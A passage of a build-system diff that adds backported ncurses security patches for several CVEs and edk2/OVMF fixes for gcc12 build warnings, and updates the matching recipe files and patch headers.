+ #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
+
+@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ {
+ int i;
+ char *p;
++ bool corrupt = FALSE;
+
+ for (i = 0; i < count; i++) {
+ if (IS_NEG1(buf + 2 * i)) {
+@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ } else if (MyNumber(buf + 2 * i) > size) {
+ Strings[i] = ABSENT_STRING;
+ } else {
+- Strings[i] = (MyNumber(buf + 2 * i) + table);
+- TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
++ int nn = MyNumber(buf + 2 * i);
++ if (nn >= 0 && nn < size) {
++ Strings[i] = (nn + table);
++ TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
++ _nc_visbuf(Strings[i])));
++ } else {
++ if (!corrupt) {
++ corrupt = TRUE;
++ TR(TRACE_DATABASE,
++ ("ignore out-of-range index %d to Strings[]", nn));
++ _nc_warning("corrupt data found in convert_strings");
++ }
++ Strings[i] = ABSENT_STRING;
++ }
+ }
+
+ /* make sure all strings are NUL terminated */
+@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
+ * looking for compiled (binary) terminfo data.
+ *
+ * cgetent uses a two-level lookup. On the first it uses the given
+- * name to return a record containing only the aliases for an entry.
++ * name to return a record containing only the aliases for an entry.
+ * On the second (using that list of aliases as a key), it returns the
+ * content of the terminal description. We expect second lookup to
+ * return data beginning with the same set of aliases.
+@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
+ #endif /* NCURSES_USE_DATABASE */
+
+ /*
+- * Find and read the compiled entry for a given terminal type, if it exists.
++ * Find and read the compiled entry for a given terminal type, if it exists.
+ * We take pains here to make sure no combination of environment variables and
+ * terminal type name can be used to overrun the file buffer.
+ */
+--
+2.36.1
+
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-29491.patch b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
new file mode 100644
index 0000000000..0a0497723f
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+Author: Sven Joachim <svenjoac@gmx.de>
+Description: Change the --disable-root-environ configure option behavior
+ By default, the --disable-root-environ option forbids program run by
+ the superuser to load custom terminfo entries. This patch changes
+ that to only restrict programs running with elevated privileges,
+ matching the behavior of the --disable-setuid-environ option
+ introduced in the 20230423 upstream patchlevel.
+Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
+Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
+Forwarded: not-needed
+Last-Update: 2023-05-01
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
+CVE: CVE-2023-29491
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ ncurses/tinfo/access.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+--- a/ncurses/tinfo/access.c
++++ b/ncurses/tinfo/access.c
+@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
+ NCURSES_EXPORT(int)
+ _nc_env_access(void)
+ {
++ int result = TRUE;
++
+ #if HAVE_ISSETUGID
+ if (issetugid())
+- return FALSE;
++ result = FALSE;
+ #elif HAVE_GETEUID && HAVE_GETEGID
+ if (getuid() != geteuid()
+ || getgid() != getegid())
+- return FALSE;
++ result = FALSE;
+ #endif
+- /* ...finally, disallow root */
+- return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
++ return result;
+ }
+ #endif
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
+Fix for CVE-2023-50495 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
+
+Reference:
+https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
+
+Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
+Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
+CVE: CVE-2023-50495
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
+ 1 file changed, 16 insertions(+), 7 deletions(-)
+
+diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
+index 23574b66..56ba9ae6 100644
+--- a/ncurses/tinfo/parse_entry.c
++++ b/ncurses/tinfo/parse_entry.c
+@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ /* Well, we are given a cancel for a name that we don't recognize */
+ return _nc_extend_names(entryp, name, STRING);
+ default:
+- return 0;
++ return NULL;
+ }
+
+ /* Adjust the 'offset' (insertion-point) to keep the lists of extended
+@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ for (last = (unsigned) (max - 1); last > tindex; last--)
+
+ if (!found) {
++ char *saved;
++
++ if ((saved = _nc_save_str(name)) == NULL)
++ return NULL;
++
+ switch (token_type) {
+ case BOOLEAN:
+ tp->ext_Booleans++;
+@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ TYPE_REALLOC(char *, actual, tp->ext_Names);
+ while (--actual > offset)
+ tp->ext_Names[actual] = tp->ext_Names[actual - 1];
+- tp->ext_Names[offset] = _nc_save_str(name);
++ tp->ext_Names[offset] = saved;
+ }
+
+ temp.nte_name = tp->ext_Names[offset];
+@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
+ bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
+ if (is_use || is_tc) {
++ char *saved;
++
+ if (!VALID_STRING(_nc_curr_token.tk_valstring)
+ || _nc_curr_token.tk_valstring[0] == '\0') {
+ _nc_warning("missing name for use-clause");
+@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ _nc_curr_token.tk_valstring);
+ continue;
+ }
+- entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
+- entryp->uses[entryp->nuses].line = _nc_curr_line;
+- entryp->nuses++;
+- if (entryp->nuses > 1 && is_tc) {
+- BAD_TC_USAGE
++ if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
++ entryp->uses[entryp->nuses].name = saved;
++ entryp->uses[entryp->nuses].line = _nc_curr_line;
++ entryp->nuses++;
++ if (entryp->nuses > 1 && is_tc) {
++ BAD_TC_USAGE
++ }
+ }
+ } else {
+ /* normal token lookup */
+--
+2.25.1
+
diff --git a/meta/recipes-core/ncurses/files/config.cache b/meta/recipes-core/ncurses/files/config.cache
deleted file mode 100644
index 6a9217d5bb..0000000000
--- a/meta/recipes-core/ncurses/files/config.cache
+++ /dev/null
@@ -1,4 +0,0 @@
-#! /bin/sh
-
-cf_cv_func_nanosleep=yes
-cf_cv_func_mkstemp=yes
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index 4156bf4f7d..ee0b15ecf0 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,10 +13,11 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
inherit autotools binconfig-disabled multilib_header pkgconfig
# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
EXTRA_AUTORECONF = "-I m4"
-CONFIG_SITE =+ "${WORKDIR}/config.cache"
+
+CACHED_CONFIGUREVARS = "cf_cv_func_nanosleep=yes"
EXTRASITECONFIG = "CFLAGS='${CFLAGS} -I${SYSROOT_DESTDIR}${includedir}'"
@@ -306,7 +307,7 @@ FILES_${PN}-tools = "\
"
# 'reset' is a symlink to 'tset' which is in the 'ncurses' package
-RDEPENDS_${PN}-tools = "${PN}"
+RDEPENDS_${PN}-tools = "${PN} ${PN}-terminfo-base"
FILES_${PN}-terminfo = "\
${datadir}/terminfo \
@@ -318,3 +319,8 @@ FILES_${PN}-terminfo-base = "\
RSUGGESTS_${PN}-libtinfo = "${PN}-terminfo"
RRECOMMENDS_${PN}-libtinfo = "${PN}-terminfo-base"
+
+# Putting terminfo into the sysroot adds around 2800 files to
+# each recipe specific sysroot. We can live without this, particularly
+# as many recipes may have native and target copies.
+SYSROOT_DIRS_remove = "${datadir}"
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index 723e685a9b..dbff149f55 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -2,12 +2,16 @@ require ncurses.inc
SRC_URI += "file://0001-tic-hang.patch \
file://0002-configure-reproducible.patch \
- file://config.cache \
+ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+ file://CVE-2021-39537.patch \
+ file://CVE-2022-29458.patch \
+ file://CVE-2023-29491.patch \
+ file://CVE-2023-50495.patch \
"
# commit id corresponds to the revision in package version
SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
S = "${WORKDIR}/git"
-EXTRA_OECONF += "--with-abi-version=5 --cache-file=${B}/config.cache"
+EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
# This is needed when using patchlevel versions like 6.1+20181013
diff --git a/meta/recipes-core/os-release/os-release.bb b/meta/recipes-core/os-release/os-release.bb
index a29d678125..33f75e39b8 100644
--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
# Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
# HOME_URL SUPPORT_URL BUG_REPORT_URL
-OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME"
+OS_RELEASE_FIELDS = "\
+ ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
+"
OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
ID = "${DISTRO}"
diff --git a/meta/recipes-core/ovmf/ovmf-shell-image.bb b/meta/recipes-core/ovmf/ovmf-shell-image.bb
index 0d2b8bf52f..fd4fb5b732 100644
--- a/meta/recipes-core/ovmf/ovmf-shell-image.bb
+++ b/meta/recipes-core/ovmf/ovmf-shell-image.bb
@@ -1,4 +1,5 @@
DESCRIPTION = "boot image with UEFI shell and tools"
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# For this image recipe, only the wic format with a
# single vfat partition makes sense. Because we have no
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..4418d52898
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
+From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:34 +0800
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+GenFfs.c:545:5: error: pointer ?InFileHandle? used after ?fclose? [-Werror=use-after-free]
+ 545 | Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+GenFfs.c:544:5: note: call to ?fclose? here
+ 544 | fclose (InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
+ BaseTools/Source/C/GenSec/GenSec.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
+index 949025c33325..d78d62ab3689 100644
+--- a/BaseTools/Source/C/GenFfs/GenFfs.c
++++ b/BaseTools/Source/C/GenFfs/GenFfs.c
+@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
+diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
+index d54a4f9e0a7d..b1d05367ec0b 100644
+--- a/BaseTools/Source/C/GenSec/GenSec.c
++++ b/BaseTools/Source/C/GenSec/GenSec.c
+@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..a6ef87aa79
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
+From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Tue, 10 Jan 2023 06:15:00 -1000
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+Sdk/C/LzmaEnc.c: In function ?LzmaEnc_CodeOneMemBlock?:
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*p.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*(CLzmaEnc *)pp.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+cc1: all warnings being treated as errors
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+index e281716fee..b575c4f888 100644
+--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
++++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
+
+ nowPos64 = p->nowPos64;
+ RangeEnc_Init(&p->rc);
+- p->rc.outStream = &outStream.vt;
+
+ if (desiredPackSize == 0)
+ return SZ_ERROR_OUTPUT_EOF;
+
++ p->rc.outStream = &outStream.vt;
+ res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);
++ p->rc.outStream = NULL;
+
+ *unpackSize = (UInt32)(p->nowPos64 - nowPos64);
+ *destLen -= outStream.rem;
+--
+2.25.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
new file mode 100644
index 0000000000..73a432684c
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
+From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:36 +0800
+Subject: [PATCH] Basetools: turn off gcc12 warning
+
+In function ?SetDevicePathEndNode?,
+ inlined from ?FileDevicePath? at DevicePathUtilities.c:857:5:
+DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
+ 321 | memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In file included from UefiDevicePathLib.h:22,
+ from DevicePathUtilities.c:16:
+../Include/Protocol/DevicePath.h: In function ?FileDevicePath?:
+../Include/Protocol/DevicePath.h:51:9: note: destination object ?Type? of size 1
+ 51 | UINT8 Type; ///< 0x01 Hardware Device Path.
+ | ^~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
+index 7ca08af9662d..b05d2bddfa68 100644
+--- a/BaseTools/Source/C/DevicePath/GNUmakefile
++++ b/BaseTools/Source/C/DevicePath/GNUmakefile
+@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o DevicePathUtili
+
+ include $(MAKEROOT)/Makefiles/app.makefile
+
++# gcc 12 trips over device path handling
++BUILD_CFLAGS += -Wno-error=stringop-overflow
++
+ LIBS = -lCommon
+ ifeq ($(CYGWIN), CYGWIN)
+ LIBS += -L/lib/e2fsprogs -luuid
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 0000000000..d658123b81
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+
+ BrotliDecoderResult BrotliDecoderDecompress(
+- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+- uint8_t* decoded_buffer) {
++ size_t encoded_size,
++ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++ size_t* decoded_size,
++ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+ BrotliDecoderState s;
+ BrotliDecoderResult result;
+ size_t total_out = 0;
+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+
+ BROTLI_BOOL BrotliEncoderCompress(
+ int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+- const uint8_t* input_buffer, size_t* encoded_size,
+- uint8_t* encoded_buffer) {
++ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++ size_t* encoded_size,
++ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+ BrotliEncoderState* s;
+ size_t out_size = *encoded_size;
+ const uint8_t* input_start = input_buffer;
+--
+2.31.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
index 6ecb23b29f..c32963a807 100644
--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
-From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001
+From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Thu, 9 Jun 2016 02:23:01 -0700
-Subject: [PATCH 1/5] ovmf: update path to native BaseTools
+Subject: [PATCH 1/4] ovmf: update path to native BaseTools
BaseTools is a set of utilities to build EDK-based firmware. These utilities
are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
source edksetup.sh BaseTools
else
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
-From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001
+From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Fri, 26 Jul 2019 17:34:26 -0400
-Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake
+Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
Prepend the build flags with those of bitbake. This is to build
using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
Upstream-Status: Pending
---
- BaseTools/Source/C/Makefiles/header.makefile | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
+ BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
-index 4e9b36d98b..eb03ee33fa 100644
+index 1c105ee7d4..d5eea3864e 100644
--- a/BaseTools/Source/C/Makefiles/header.makefile
+++ b/BaseTools/Source/C/Makefiles/header.makefile
-@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH)
+@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
endif
INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)
@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \
-Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g
else
+ ifeq ($(CXX), llvm)
+-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
++BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+ -fno-delete-null-pointer-checks -Wall -Werror \
+ -Wno-deprecated-declarations -Wno-self-assign \
+ -Wno-unused-result -nostdlib -g
+ else
-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
-fno-delete-null-pointer-checks -Wall -Werror \
-Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \
-Wno-unused-result -nostdlib -g
endif
+ endif
+ ifeq ($(CXX), llvm)
+-BUILD_LFLAGS =
+-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result
++BUILD_LFLAGS = $(LDFLAGS)
++BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result
+ else
-BUILD_LFLAGS =
-BUILD_CXXFLAGS = -Wno-unused-result
+BUILD_LFLAGS = $(LDFLAGS)
+BUILD_CXXFLAGS += -Wno-unused-result
-
+ endif
++
ifeq ($(HOST_ARCH), IA32)
#
+ # Snow Leopard is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
index ab1e7db31f..df1d159011 100644
--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
-From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001
+From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
From: Dengke Du <dengke.du@windriver.com>
Date: Mon, 11 Sep 2017 02:21:55 -0400
-Subject: [PATCH 3/5] ovmf: enable long path file
+Subject: [PATCH 3/4] ovmf: enable long path file
Upstream-Status: Pending
Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
#define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)
#define MAX_UINT32 ((UINT32)0xFFFFFFFF)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
-From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001
+From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
From: Steve Langasek <steve.langasek@ubuntu.com>
